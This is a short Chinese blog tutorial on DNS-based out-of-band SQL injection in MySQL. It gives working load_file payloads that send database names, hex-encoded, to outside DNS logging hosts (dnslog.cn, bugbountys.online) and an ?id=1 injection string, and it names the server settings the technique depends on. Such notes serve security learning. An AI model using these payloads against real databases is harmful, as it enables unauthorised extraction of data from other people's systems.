DNS注入

发布于 2022-02-05  125 次阅读


当DNS服务器进行域名解析之后,会生成一个解析日志。利用日志看回显,讲盲注变成报错注入

dnslog.cn

原理

假设提供的域名是abc.dnslog.cn
我们ping  admin.abc.dnslog.cn 就会在生成一个临时日志,并回显出来
我们在mysql里测试select concat((select database()),'.abc.dnslog.cn');发现成功
利用load_file读文件
select load_file(concat('//',(select database()),'.abc.dnslog.cn/1.txt'));
由于dns大小写不敏感,这里加上hex编码
?id=1 and select load_file(concat('//',(select hex(database())),'.abc.dnslog.cn/1.txt'));
之后就可以愉快的暴表爆字段暴内容了

前提
1.[mysqld]
secure_file_priv=""

2.能上网

select load_file('\\\\baidu.admin.36.dns.bugbountys.online\\abc');

select load_file(concat('//',database(),'.admin.36.dns.bugbountys.online/abc'));

子夜不哭
最后更新于 2022-02-05